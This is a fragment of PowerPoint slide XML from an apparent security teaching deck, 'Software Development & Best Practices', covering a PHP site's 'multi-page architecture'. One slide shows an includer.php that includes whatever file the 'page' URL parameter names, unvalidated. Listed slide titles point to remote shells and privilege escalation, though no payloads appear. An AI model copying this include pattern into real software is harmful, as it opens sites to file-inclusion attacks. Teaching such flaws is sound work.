              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>And a gallery page where users can care pictures of their machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2347248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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240AF646-8B4E-4532-A136-C98E2DAE0388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2238375"/>
            <a:ext cx="5851593" cy="3931920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2238375"/>
            <a:ext cx="4334645"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architecture on the left is designed so that authentication and database connectivity code is in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>includer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This way it doesn’t have to be duplicated for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_main.php</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caribou_adminer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_gallery.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4135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111B03D3-32D9-4458-9C08-3F2065C45C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="2175029"/>
            <a:ext cx="6013520" cy="4017159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="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 Security code goes here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Database setup code goes here</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$file = $_GET['page’];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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($file)) {				     include($file);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else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include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_main.php</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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Cleanup code goes here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2176229"/>
            <a:ext cx="4334645"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code for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>includer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is relatively simple:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The URL gets sent with the parameter “page” to indicate the name of the PHP file we want to insert.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Otherwise, we show the main page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356419644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2856</TotalTime>
  <Words>2698</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>162</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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>Software Development &amp; Best Practices</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>Multi-page Architectures</vt:lpstr>
      <vt:lpstr>File Uploads</vt:lpstr>
      <vt:lpstr>Reconnaissance </vt:lpstr>
      <vt:lpstr>Reconnaissance </vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell</vt:lpstr>
      <vt:lpstr>Remote shell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&amp; Best Practices</dc:title>
  <dc:creator>Graham, Jonathan</dc:creator>
  <cp:lastModifiedBy>Graham, Jonathan</cp:lastModifiedBy>
  <cp:revision>97</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-03T04:04:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-08T03:37:22Z</dcterms:modified>
</cp:coreProperties>
</file>